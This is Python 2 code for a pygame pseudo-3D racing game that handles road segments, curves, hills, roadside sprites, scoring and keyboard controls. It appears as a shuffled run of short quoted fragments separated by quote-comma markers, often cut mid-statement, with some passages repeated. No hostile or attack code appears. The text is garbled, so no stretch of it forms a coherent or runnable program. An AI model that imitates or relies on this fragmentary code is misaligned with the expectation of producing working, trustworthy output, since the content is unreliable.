#self.player_x += self.player_x_dt self.player_x += self.speed /", "* 2 if sky.rect.left - sky.rect.width > 0: sky.rect.left -=", "trees.rect.width < 0: trees.rect.left += trees.rect.width * 2 if trees.rect.left", "9 if self.player_x < -1000: self.player_di = 1 elif self.player_di", "def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with", "- self.camera_z - self.position zc2 = zw2 - self.camera_z -", "util_ease_in(self, a, b, percent): return a + (b - a)", "+ dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) xp1 =", "self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is None: di =", "not segs: segs = self.segments segs_c = [] for seg", "[] x, y = 0.0, 0.0 tht = 0.0 rad_m", "'EASY': 2, 'MEDIUM': 4, 'HARD': 6 }, 'HILL': {'NONE': 0,", "RETURN : go to a new road TODO: * hill", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self,", "- obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2 #obj.scale(scale)", "for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116 - int(ys1)), #", "self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees", "#n = seg_n / 20 n = seg_n / random.randint(10,", "e_keys_up: if self.player_di != 1: self.player_di = 0 def update_world(self):", "sprt_x = obj.rect.left sprt_w = obj.rect.width car_x = self.player_x car_w", "mx): result -= mx while (result < 0): result +=", "FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main():", "y]) #print pnts return pnts def draw_segs(self, segs, rad): pnts", "#print 'scale <1>', scale pass else: try: obj.scale(scale) except: #print", "ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4,", "a) * ((-math.cos(percent * math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n,", "if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n)", "dx2 #+ dx1 ''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "else: self.speed -= self.speed_dt_na # if on the grass, slow", "xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2", "not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200", "#theta_i = math.pi /180.0 * 0.1 #theta_i = math.pi /180.0", "FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left", "/ 2.0 / self.seg_draw_n engi = math.pi / 2.0 /", "ys3 self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,", "self.player_seg = self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5", "= self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4 =", "self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self):", "tht -= tht_d rad_m = 20.0#10.0#50.0# cv_s = 0 cv_l", "self.pglc.K_SPACE: # hide / show road map self.rdmap_hide() elif k", "self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value, mn, mx): return max(mn,", "'#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555',", "self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass", "rad) #print pnts if len(pnts) <= 1: return #if len(pnts)", "sky.rect.width * 2 for hill in self.bg_hills: hill.rect.left += int(self.hill_speed", "220 }, 'STUMP': { 'x': 995, 'y': 330, 'w': 195,", "rad_m = 20.0#10.0#50.0# cv_s = 0 cv_l = 0.0 else:", "else: return self.check_key(events) def key_to_di(self, k): if k == self.pglc.K_UP:", "< 0: # self.score = 0 self.game_over = True self.game_score", "2 in e_keys_dn: self.player_go = 2 if 1 in e_keys_dn:", "* 4#2 rad1 = rad + self.road_w / 2 rad2", "# with looping result = start + increment while (result", "if curve == 0.0: if cv_s: tht_d = self.cv_to_engl(cv_l, rad)", "self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not segs_file:", "time.time() self.tm_last_once = self.tm_end - self.tm_start else: self.tm_start = 0.0", "**kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf,", "self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left", "self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left + hill.rect.width", "'BILLBOARD06': { 'x': 488, 'y': 555, 'w': 298, 'h': 190", "xc4 = xc4 - x_curve - dx_curve xcl1 = xc1", "0.5#1.0#0.1# else: if cv_s: cv_l += curve else: cv_s =", "# TODO: do at update #dpx1 = self.seg_len * math.tan(theta_i)", "self.tm_last_once = self.tm_end - self.tm_start else: self.tm_start = 0.0 #self.tm_end", "class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file,", "self.game_over = False self.game_score = 0.0 self.tm_start = 0.0 self.tm_end", "/ 2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2] #x_sprt", "yp return ys def rd_seg_init(self, a=500): for n in range(a):", "p_curve = self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve', p_curve", "- self.player_x - curve_d * i #xc2 = -self.road_w /", "return None def check_key(self, events): #print id(events) r_events = []", "ys2, xs4, ys4, xs3, ys3, seg['color']['road']) if 1:#i % 2", "hold = random.randint(10, 100) leave = random.randint(10, 100) self.add_road(enter, hold,", "self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width", "(car_x + car_w / 2) < sprt_x < (car_x +", "0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y]) for", "xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc, self.d, zc1) ys1", "1: return #if len(pnts) > 0: # pnts.append(pnts[0]) cpnts =", "yp ys = h / 2.0 - yp return ys", "rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self):", "handle_event(self, events, *args, **kwargs): #print '>>> ', events if not", "- hill.rect.width > 0: hill.rect.left -= hill.rect.width * 2 for", "5, 'w': 385, 'h': 265 }, 'TREE1': { 'x': 625,", "'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'],", "#x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' # <1> zw1", "< 10: print '>>> ', i print 'curve', seg.get('curve', 0.0)", "self.player_x += p_dt def check_if_car_out_road(self): # decrease score when go", "#self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0, self.size[0] - 2, y]) #", "## self.xp = 0.0 self.yp = 0.0 self.xs = 0.0", "x_curve = 0 #print 'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z']", "FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width or height is too large", "si seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len", "trees.rect.left - trees.rect.width > 0: trees.rect.left -= trees.rect.width * 2", "a if a < -1.0: a = -1.0 elif a", "scale > 500: #print 'scale <1>', scale pass else: try:", "segs_c.append(seg_c) return segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s", "if self.tm_start == 0.0: self.tm_start = time.time() self.tm_end = self.tm_start", "x_curve = x_curve + dx_curve dx_curve = dx_curve + seg.get('curve',", "ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc2,", "if i < self.seg_draw_n / 4: theta1 = theta_i *", "#self.segments[2]['color'] = FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y']", "k == self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB: self.road_reset_keep_segs() elif", "}, 'CACTUS': { 'x': 929, 'y': 897, 'w': 235, 'h':", "self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456", "rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w / 2 - self.player_x xc2", "self.h = h self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d", "NOTE: only show one break return obj def handle_event(self, events,", "'x': 5, 'y': 495, 'w': 1280, 'h': 480 }, 'TREES':", "= segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self,", "yw start_y = self.seg_lasy_y() end_y = start_y + (int(yw) *", "elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events def", "= h self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d =", "@classmethod def create_by_img(cls, img): return cls(img) # for test #o", "elif k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif event.type ==", "self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y, self.size[0] - 2, y])", "(len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n = len(self.segments)", "200 / n * (n - i) self.c[3] = ca", "-= self.speed / 5 + 20 else: pass p_curve =", "230, 'y': 280, 'w': 320, 'h': 220 }, 'COLUMN': {", "leave, curve, yw start_y = self.seg_lasy_y() end_y = start_y +", "{ 'x': 995, 'y': 531, 'w': 80, 'h': 41 }", "k not in ['sprites']: seg_c[k] = v else: seg_c[k] =", "reflect the y- d = 116 pnts = [[x1, d-y1],", "897, 'w': 298, 'h': 190 }, 'BILLBOARD07': { 'x': 313,", "a s = 1.0 if a < 0.0: s =", "xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3", "#'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,},", "[[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]", "def geo_prjc_scale(self, d, zc): if zc == 0.0: return 1.0", "+= self.speed if self.position > self.track_len: self.position -= self.track_len #", "xsl1 = self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2", "self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' # <1>", "{'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat':", "- self.player_x xc4 = (rad - xx4) - self.player_x xp1", "math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n, total): return (n %", "5, 'y': 5, 'w': 215, 'h': 540 }, 'BILLBOARD08': {", "% seg_n return i def rd_get_segs(self, whole=False): if whole: segs", "self.seg_len * 2: if self.tm_start == 0.0: self.tm_start = time.time()", "self.track_len = 0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h", "/ 2 - self.player_x xc4 = -self.road_w / 2 -", "'h': 220 }, 'STUMP': { 'x': 995, 'y': 330, 'w':", "yc2 = yc - yw2 #print yw1, yw2 xp1 =", "self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock, *args,", "x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale", "self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left =", "= 0 # <1> #for i, seg in enumerate(self.segments): #", "''' #if 1: #if i < self.seg_draw_n / 2: if", "num, num, 0, height/2.0) self.add_road(num, num, num, 0, 0) def", "(640 - self.car.rect.width) / 2 ##self.disp_add(self.car) # car disp add", "sky.rect.width * 2 if self.speed <= 0.0: return p_curve =", "obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj)", "/ 2 - self.player_x #xcl1 = xc1 - self.lane_w #xcl2", "SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def", "car_w / 2), sprt_at, (car_x + car_w / 2) #print", "self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1,", "v + (accel * dt) def util_increase(self, start, increment, mx):", "'h': 55 }, 'CAR02': { 'x': 1383, 'y': 825, 'w':", "< 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter", "spr.items(): if sk not in ['obj']: spr_n[sk] = sv else:", "self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len self.prog.progress(prg) spdc = self.road.speed", "zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1)", "cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self,", "FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def", "self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave),", "def rd_seg_init(self, a=500): for n in range(a): self.rd_seg_add(0.0, 0.0) def", "'HIGH': 60 }, } FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'],", "= obj # for reset to delete all # NOTE:", "curve xc1 = xc1 - x_curve xc2 = xc2 -", "= FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def", "= math.pi /180.0 * 0.1 #theta_i = math.pi /180.0 *", "in segs: if not seg['sprites']: segs_c.append(seg) else: seg_c = {}", "[x3, d-y3], [x4, d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try:", "+= 19 if self.player_x > 1000: self.player_di = 3 #'''", "SptTmpi(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne):", "e_keys_up self.e_keys_dn = e_keys_dn return r_events def refresh__1(self, fps_clock, *args,", "'obj': None, # need to create at render ##'x_i': None,", "+ '_' + sprt obj = info.get('obj') ''' # TODO:", "self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x -= self.speed /", "152 }, 'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230,", "self.road_w / 2 - self.player_x xc2 = -self.road_w / 2", "self.d, zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1,", "* self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len def", "100 self.disp_add(self.sn1) ''' ''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top", "self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True)", "get_segs_pnts_1(self, segs, rad): pnts = [] x, y = 0.0,", "6 }, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH':", "self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3,", "xp def yc_to_yp(self, yc, d, zc): if zc == 0.0:", "(accel * dt) def util_increase(self, start, increment, mx): # with", "'h': 190 }, 'BILLBOARD07': { 'x': 313, 'y': 897, 'w':", "% 4 == 0: c = FP_COLORS['LIGHT'] #c = {'road':", "{ 'HILLS': { 'x': 5, 'y': 5, 'w': 1280, 'h':", "{'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart':", "} FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1':", "[[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]", "self.fog.rect.top = 240 self.fog.rect.left = 0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None):", "spr in seg['sprites']: spr_n = {} for sk, sv in", "xs2, ys2 print xs4, ys4, xs3, ys3 print '-' *", "self.player_x xcr3 = self.lane_w - self.player_x xcr4 = -self.lane_w -", "range(n): j = random.randint(10, seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys())", "curve = 0.0 yw = 0.0 #elif p < 0.8:", "1#self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left += sky.rect.width", "0.9 #theta_i = 0.0 #xc1 = self.road_w / 2 -", "> self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self,", "circle\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i = math.pi", "2 if sky.rect.left - sky.rect.width > 0: sky.rect.left -= sky.rect.width", "-1100 #print 'sprt_x', sprt_x #print 'car_x', car_x #print 'car_w', car_w", "self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1,", "seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test 2: draw a circle\"\"\" #theta_i", "yc * (d / zc) return yp def xp_to_xs(self, xp,", "self.camera_z - (self.position % self.seg_len) zc2 = zw2 - self.camera_z", "#print '=' * 80 #print 'self.position', self.position for i, seg", "d, zc): if zc == 0.0: return 1.0 else: return", "self.speed / 5 + 20 else: pass p_curve = self.player_seg.get('curve',", "#xp = float('inf') #xp = 2 ** 64 xp =", "#if n % 4 == 0: c = FP_COLORS['LIGHT'] #c", "0, -height) self.add_road(num, num, num, 0, height) self.add_road(num, num, num,", "= self.road_w / 2 - self.player_x #xc2 = -self.road_w /", "y3], [x4, y4], [x1, y1]] #pnts = [[x1, y1-d], [x2,", "'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y',", "**kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg()", "we should use the segment just under the car #sprts", "['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs':", "def __init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg = cfg", "obj = sprt.get('obj') if not obj: # None or 0", "'y': 5, 'w': 360, 'h': 360 }, 'DEAD_TREE1': { 'x':", "def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left =", "FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos)", "self.car.rect.width) / 2 ##self.disp_add(self.car) # car disp add after road", "self.position += 10.0#5.0#1.0 self.position += random.randint(2, 10) if self.position >", "xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i =", "25, 'MEDIUM': 50, 'LONG': 100 }, # num segments 'CURVE':", "= int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n", "x from x_pos 'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), }", "self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file =", "1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0 self.score = 0", "int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments) i = (i +", "(self.size[0] / 2, self.size[1] / 2), self.size[0] / 2, 0)", "xc1 = self.road_w / 2 - self.player_x xc2 = -self.road_w", "self.camera_h #print '=' * 80 #print 'self.position', self.position # <2>", "ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf,", "[x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]] c =", "* math.tan(theta2) xs1 += dx1 xs2 += dx1 xs3 +=", "= len(self.segments) #print n if n % 2 == 0:", "{ 'x': 488, 'y': 555, 'w': 298, 'h': 190 },", "= self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve * b_percent) x_curve", "5, 'y': 985, 'w': 1280, 'h': 480 }, } IMG_POS_SPRITES", "ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i", "3 #''' #''' self.position += 10.0#5.0#1.0 self.position += random.randint(2, 10)", "segs: segs = self.segments segs_c = [] for seg in", "p_dt = self.speed * p_curve * self.centrifugal #print p_dt #self.player_x", "in enumerate(self.segments): # <2> for i in range(self.seg_draw_n): #''' #", "{ 'x': 929, 'y': 897, 'w': 235, 'h': 118 },", "self.d, zc1) xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d,", "FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10',", "dx1 xs4 += dx2 #+ dx1 #''' self.render_polygon(None, 0, ys1,", "* b_percent) x_curve = 0 #print 'b_curve', b_curve #print 'world", "'h': 170 }, 'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w':", "self.road_reset() elif k == self.pglc.K_TAB: self.road_reset_keep_segs() elif k == self.pglc.K_BACKSPACE:", "= self.key_to_di_b(event.key) if di is not None: e_keys_dn.append(di) else: r_events.append(event)", "theta_i = math.pi /180.0 * 0.9 #theta_i = 0.0 xc1", "road if self.player_x < -self.road_w / 2 or \\ self.player_x", "/ 2 yc = self.camera_h print '=' * 80 print", "utils.json_dumps(sc) with open(f, 'w') as fo: fo.write(s) def rd_seg_json_load(self, f):", "0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top = 100", "{'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr':", "'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,},", "- x_curve - dx_curve xcl1 = xc1 - self.lane_w xcl2", "self.w = self.size[0] self.h = self.size[1] if not keep_segs: self.segments", "2 #x_pos = [rd_w_half + self.lane_w, # rd_w_half - self.lane_w]", "= self.player_seg.get('curve', 0.0) #print 'p_curve', p_curve p_dt = self.speed *", "with right order for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self,", "2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2] #x_sprt =", "= self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' #", "[] # for sprites render order self.track_len = 0.0 self.seg_len", "super(FPSptRoadB, self).__init__(size) self.cfg = cfg self.car = kwargs.get('car') self.bg_sky =", "0 cv_l = 0.0 else: rad_m = 0.5#1.0#0.1# else: if", "= self.xc_to_xp(xcl1, self.d, zc1) xsl1 = self.xp_to_xs(xpl1, self.w) xpl2 =", "self.size[0] self.h = self.size[1] if not keep_segs: self.segments = []", "'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self):", "the road if self.player_x < -self.road_w / 2 or \\", "num, num, 0, height/2.0) self.add_road(num, num, num, 0, -height) self.add_road(num,", "zc): if zc == 0.0: #xp = float('inf') #xp =", "self.position - (zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1, self.d, zc1)", "= 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg = None # the", "#xcl1 = xc1 - self.lane_w #xcl2 = xc2 + self.lane_w", "#tht_d = math.acos(a) tht_d = math.asin(a) # TODO: tht +=", "0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 }, } FP_ROAD_SPRTS", "40) curve = rl * random.random() * 8.0 yw =", "x4, y4, color): #d = 200#100#240#50# #a = 60 #pnts", "= 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w =", "self.h = self.size[1] if not keep_segs: self.segments = [] self.rd_sprt_objs", "0.3: curve = 0.0 yw = 0.0 #elif p <", "x_i == 4: sprt_at = 1100 elif x_i == 5:", "#d = 200#100#240#50# #a = 60 #pnts = [[x1, y1],", "zw1 - self.camera_z - self.position zc2 = zw2 - self.camera_z", "= [rd_w_half + self.lane_w, # rd_w_half - self.lane_w] sprt_x =", "}, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961, 'w': 80, 'h':", "segs: if not seg['sprites']: segs_c.append(seg) else: seg_c = {} for", "rad_m = 1.0#0.1# else: a = float(curve) / rad a", "= 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h = self.size[1] if not", "'w': 1280, 'h': 480 }, 'SKY': { 'x': 5, 'y':", "refresh(self, fps_clock, *args, **kwargs): pass class GMFlatpath(pygm.PyGMGame): def __init__(self, title,", "- yp return ys def rd_seg_init(self, a=500): for n in", "def seg_lasy_y(self): seg_n = len(self.segments) if seg_n == 0: return", "'h': 480 }, } IMG_POS_SPRITES = { 'PALM_TREE': { 'x':", "0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for i in", "for k, sprt in self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt) del", "= 0 # 0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn", "self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left =", "/ 2 #x_pos = [rd_w_half + self.lane_w, # rd_w_half -", "== 0: return 0.0 else: return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)", "print 'self.position', self.position # <2> seg_n = len(self.segments) segbi =", "self.segments = [] self.rd_sprt_objs = {} self.rd_sprt_cache = [] #", "<1> if not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj", "zw2 - self.camera_z - self.position #zc1 = self.position - (zw1", "xs1 += dx1 xs2 += dx1 xs3 += dx2 #+", "yc - yw1 yc2 = yc - yw2 #print yw1,", "NOTE: render out here self.rd_sprt_objs[obj_k] = obj # for reset", "if p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM'])", "self.player_x #xcl1 = xc1 - self.lane_w #xcl2 = xc2 +", "= utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up = []", "= random.choice([1, -1]) enter = random.randint(10, 40) hold = random.randint(10,", "/ 5 + 20 else: pass p_curve = self.player_seg.get('curve', 0.0)", "2 - self.player_x - curve_d * i # <3> xx1", "http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT * SPACE : hide/show road", "'h': 41 } } FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK = '#000000'", "== self.pglc.K_RIGHT: return 1 elif k == self.pglc.K_DOWN: return 2", "2.0 #x_sprt = random.choice(x_pos) x_i = random.randint(0, len(x_pos) - 1)", "spdc = self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self,", "# TODO: tht += tht_d rad_m = 10.0#50.0# x +=", "segbi # TODO: do at update #dpx1 = self.seg_len *", "xpr3 = self.xc_to_xp(xcr3, self.d, zc2) xsr3 = 